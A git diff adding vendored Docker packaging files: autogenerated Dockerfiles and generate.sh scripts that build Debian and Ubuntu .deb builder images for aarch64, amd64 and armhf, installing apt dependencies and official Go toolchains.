a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile new file mode 100644 index 0000000000..d04860ccd7 
--- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile @@ -0,0 +1,24 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"! +# + +FROM aarch64/ubuntu:trusty + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev golang-1.6-go --no-install-recommends && rm -rf /var/lib/apt/lists/* + +RUN update-alternatives --install /usr/bin/go go /usr/lib/go-1.6/bin/go 100 + +# Install Go +# aarch64 doesn't have official go binaries, so use the version of go installed from +# the image to build go from source. +ENV GO_VERSION 1.7.5 +RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \ + && cd /usr/src/go/src \ + && GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash + +ENV PATH $PATH:/usr/src/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile new file mode 100644 index 0000000000..3cd8442eca --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile @@ -0,0 +1,22 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"! 
+# + +FROM aarch64/ubuntu:xenial + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-dev golang-go libseccomp-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +# Install Go +# aarch64 doesn't have official go binaries, so use the version of go installed from +# the image to build go from source. +ENV GO_VERSION 1.7.5 +RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \ + && cd /usr/src/go/src \ + && GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash + +ENV PATH $PATH:/usr/src/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux seccomp +ENV RUNC_BUILDTAGS apparmor selinux seccomp diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md new file mode 100644 index 0000000000..20a0ff1006 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md @@ -0,0 +1,5 @@ +# `dockercore/builder-deb` + +This image's tags contain the dependencies for building Docker `.deb`s for each of the Debian-based platforms Docker targets. + +To add new tags, see [`contrib/builder/deb/amd64` in https://github.com/docker/docker](https://github.com/docker/docker/tree/master/contrib/builder/deb/amd64), specifically the `generate.sh` script, whose usage is described in a comment at the top of the file. 
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh new file mode 100755 index 0000000000..8271d9dc47 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh @@ -0,0 +1,10 @@ +#!/bin/bash +set -e + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +set -x +./generate.sh +for d in */; do + docker build -t "dockercore/builder-deb:$(basename "$d")" "$d" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile new file mode 100644 index 0000000000..42aaa56c01 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile @@ -0,0 +1,20 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! +# + +FROM debian:jessie + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile new file mode 100644 index 0000000000..c052be56ce --- /dev/null +++ 
b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile @@ -0,0 +1,20 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! +# + +FROM debian:stretch + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile new file mode 100644 index 0000000000..bcedb47b94 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile @@ -0,0 +1,22 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! 
+# + +FROM debian:wheezy-backports + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list + +RUN apt-get update && apt-get install -y -t wheezy-backports btrfs-tools --no-install-recommends && rm -rf /var/lib/apt/lists/* +RUN apt-get update && apt-get install -y apparmor bash-completion build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh new file mode 100755 index 0000000000..765db5d8e9 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh @@ -0,0 +1,149 @@ +#!/bin/bash +set -e + +# usage: ./generate.sh [versions] +# ie: ./generate.sh +# to update all Dockerfiles in this directory +# or: ./generate.sh debian-jessie +# to only update debian-jessie/Dockerfile +# or: ./generate.sh debian-newversion +# to create a new folder and a Dockerfile within it + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +versions=( "$@" ) +if [ ${#versions[@]} -eq 0 ]; then + versions=( */ ) +fi +versions=( "${versions[@]%/}" ) + +for version in "${versions[@]}"; do + distro="${version%-*}" + suite="${version##*-}" + from="${distro}:${suite}" + + case "$from" in + debian:wheezy) + # add -backports, like our users have to + from+='-backports' + ;; + esac + + mkdir -p "$version" + echo 
"$version -> FROM $from" + cat > "$version/Dockerfile" <<-EOF + # + # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! + # + + FROM $from + EOF + + echo >> "$version/Dockerfile" + + if [ "$distro" = "debian" ]; then + cat >> "$version/Dockerfile" <<-'EOF' + # allow replacing httpredir or deb mirror + ARG APT_MIRROR=deb.debian.org + RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + EOF + + if [ "$suite" = "wheezy" ]; then + cat >> "$version/Dockerfile" <<-'EOF' + RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list + EOF + fi + + echo "" >> "$version/Dockerfile" + fi + + extraBuildTags='pkcs11' + runcBuildTags= + + # this list is sorted alphabetically; please keep it that way + packages=( + apparmor # for apparmor_parser for testing the profile + bash-completion # for bash-completion debhelper integration + btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) + build-essential # "essential for building Debian packages" + cmake # tini dep + curl ca-certificates # for downloading Go + debhelper # for easy ".deb" building + dh-apparmor # for apparmor debhelper + dh-systemd # for systemd debhelper integration + git # for "git commit" info in "docker -v" + libapparmor-dev # for "sys/apparmor.h" + libdevmapper-dev # for "libdevmapper.h" + libltdl-dev # for pkcs11 "ltdl.h" + libseccomp-dev # for "seccomp.h" & "libseccomp.so" + libsqlite3-dev # for "sqlite3.h" + pkg-config # for detecting things like libsystemd-journal dynamically + vim-common # tini dep + ) + # packaging for "sd-journal.h" and libraries varies + case "$suite" in + precise|wheezy) ;; + jessie|trusty) packages+=( libsystemd-journal-dev );; + *) packages+=( libsystemd-dev );; + esac + + # debian wheezy & ubuntu precise do not have the right libseccomp libs + # debian jessie & ubuntu trusty have a libseccomp < 2.2.1 :( + case "$suite" in + precise|wheezy|jessie|trusty) + packages=( 
"${packages[@]/libseccomp-dev}" ) + runcBuildTags="apparmor selinux" + ;; + *) + extraBuildTags+=' seccomp' + runcBuildTags="apparmor seccomp selinux" + ;; + esac + + + if [ "$suite" = 'precise' ]; then + # precise has a few package issues + + # - dh-systemd doesn't exist at all + packages=( "${packages[@]/dh-systemd}" ) + + # - libdevmapper-dev is missing critical structs (too old) + packages=( "${packages[@]/libdevmapper-dev}" ) + extraBuildTags+=' exclude_graphdriver_devicemapper' + + # - btrfs-tools is missing "ioctl.h" (too old), so it's useless + # (since kernels on precise are old too, just skip btrfs entirely) + packages=( "${packages[@]/btrfs-tools}" ) + extraBuildTags+=' exclude_graphdriver_btrfs' + fi + + if [ "$suite" = 'wheezy' ]; then + # pull a couple packages from backports explicitly + # (build failures otherwise) + backportsPackages=( btrfs-tools ) + for pkg in "${backportsPackages[@]}"; do + packages=( "${packages[@]/$pkg}" ) + done + echo "RUN apt-get update && apt-get install -y -t $suite-backports ${backportsPackages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" + fi + + echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile" + echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" + echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + # print build tags in alphabetical order + buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) + + echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" + echo "ENV 
RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile new file mode 100644 index 0000000000..aa027f83b3 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! +# + +FROM ubuntu:precise + +RUN apt-get update && apt-get install -y apparmor bash-completion build-essential cmake curl ca-certificates debhelper dh-apparmor git libapparmor-dev libltdl-dev libsqlite3-dev pkg-config vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor exclude_graphdriver_btrfs exclude_graphdriver_devicemapper pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile new file mode 100644 index 0000000000..b03a853ed6 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! 
+# + +FROM ubuntu:trusty + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile new file mode 100644 index 0000000000..af03f6226f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! 
+# + +FROM ubuntu:xenial + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile new file mode 100644 index 0000000000..5ac1edf1a4 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! 
+# + +FROM ubuntu:yakkety + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile new file mode 100644 index 0000000000..a4ac781eb9 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile @@ -0,0 +1,20 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! 
+# + +FROM armhf/debian:jessie + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh new file mode 100755 index 0000000000..e110a219ab --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh @@ -0,0 +1,158 @@ +#!/bin/bash +set -e + +# usage: ./generate.sh [versions] +# ie: ./generate.sh +# to update all Dockerfiles in this directory +# or: ./generate.sh debian-jessie +# to only update debian-jessie/Dockerfile +# or: ./generate.sh debian-newversion +# to create a new folder and a Dockerfile within it + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +versions=( "$@" ) +if [ ${#versions[@]} -eq 0 ]; then + versions=( */ ) +fi +versions=( "${versions[@]%/}" ) + +for version in "${versions[@]}"; do + distro="${version%-*}" + suite="${version##*-}" + from="${distro}:${suite}" + + case "$from" in + raspbian:jessie) + from="resin/rpi-raspbian:jessie" + ;; + *) + from="armhf/$from" + ;; + esac + + mkdir -p "$version" + echo "$version -> FROM $from" + cat > "$version/Dockerfile" <<-EOF + # + # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! 
+ # + + FROM $from + EOF + + echo >> "$version/Dockerfile" + + if [[ "$distro" = "debian" || "$distro" = "raspbian" ]]; then + cat >> "$version/Dockerfile" <<-'EOF' + # allow replacing httpredir or deb mirror + ARG APT_MIRROR=deb.debian.org + RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + EOF + + if [ "$suite" = "wheezy" ]; then + cat >> "$version/Dockerfile" <<-'EOF' + RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list + EOF + fi + + echo "" >> "$version/Dockerfile" + fi + + extraBuildTags='pkcs11' + runcBuildTags= + + # this list is sorted alphabetically; please keep it that way + packages=( + apparmor # for apparmor_parser for testing the profile + bash-completion # for bash-completion debhelper integration + btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) + build-essential # "essential for building Debian packages" + cmake # tini dep + curl ca-certificates # for downloading Go + debhelper # for easy ".deb" building + dh-apparmor # for apparmor debhelper + dh-systemd # for systemd debhelper integration + git # for "git commit" info in "docker -v" + libapparmor-dev # for "sys/apparmor.h" + libdevmapper-dev # for "libdevmapper.h" + libltdl-dev # for pkcs11 "ltdl.h" + libseccomp-dev # for "seccomp.h" & "libseccomp.so" + libsqlite3-dev # for "sqlite3.h" + pkg-config # for detecting things like libsystemd-journal dynamically + vim-common # tini dep + ) + # packaging for "sd-journal.h" and libraries varies + case "$suite" in + precise|wheezy) ;; + jessie|trusty) packages+=( libsystemd-journal-dev );; + *) packages+=( libsystemd-dev );; + esac + + # debian wheezy & ubuntu precise do not have the right libseccomp libs + # debian jessie & ubuntu trusty have a libseccomp < 2.2.1 :( + case "$suite" in + precise|wheezy|jessie|trusty) + packages=( "${packages[@]/libseccomp-dev}" ) + runcBuildTags="apparmor selinux" + ;; + *) + extraBuildTags+=' seccomp' + runcBuildTags="apparmor 
seccomp selinux"
+			;;
+	esac
+
+
+	if [ "$suite" = 'precise' ]; then
+		# precise has a few package issues
+
+		# - dh-systemd doesn't exist at all
+		packages=( "${packages[@]/dh-systemd}" )
+
+		# - libdevmapper-dev is missing critical structs (too old)
+		packages=( "${packages[@]/libdevmapper-dev}" )
+		extraBuildTags+=' exclude_graphdriver_devicemapper'
+
+		# - btrfs-tools is missing "ioctl.h" (too old), so it's useless
+		# (since kernels on precise are old too, just skip btrfs entirely)
+		packages=( "${packages[@]/btrfs-tools}" )
+		extraBuildTags+=' exclude_graphdriver_btrfs'
+	fi
+
+	if [ "$suite" = 'wheezy' ]; then
+		# pull a couple packages from backports explicitly
+		# (build failures otherwise)
+		backportsPackages=( btrfs-tools )
+		for pkg in "${backportsPackages[@]}"; do
+			packages=( "${packages[@]/$pkg}" )
+		done
+		echo "RUN apt-get update && apt-get install -y -t $suite-backports ${backportsPackages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile"
+	fi
+
+	echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile"
+
+	echo >> "$version/Dockerfile"
+
+	awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile"
+	if [ "$distro" == 'raspbian' ];
+	then
+		cat <<EOF >> "$version/Dockerfile"
+# GOARM is the ARM architecture version which is unrelated to the above Golang version
+ENV GOARM 6
+EOF
+	fi
+	echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile"
+	echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile"
+
+	echo >> "$version/Dockerfile"
+
+	echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile"
+
+	echo >> "$version/Dockerfile"
+
+	# print build tags in alphabetical order
+	buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' )
+
+	echo "ENV DOCKER_BUILDTAGS 
$buildTags" >> "$version/Dockerfile" + echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile new file mode 100644 index 0000000000..4dbfd093d8 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile @@ -0,0 +1,22 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! +# + +FROM resin/rpi-raspbian:jessie + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +# GOARM is the ARM architecture version which is unrelated to the above Golang version +ENV GOARM 6 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile new file mode 100644 index 0000000000..b36c1dac71 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! 
+# + +FROM armhf/ubuntu:trusty + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile new file mode 100644 index 0000000000..b5e55ad2dd --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! 
+# + +FROM armhf/ubuntu:xenial + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile new file mode 100644 index 0000000000..69c2e7f2d4 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! 
+# + +FROM armhf/ubuntu:yakkety + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh new file mode 100755 index 0000000000..7d22e8c47f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh @@ -0,0 +1,10 @@ +#!/bin/bash +set -e + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +set -x +./generate.sh +for d in */; do + docker build -t "dockercore/builder-deb:$(basename "$d")" "$d" +done diff --git 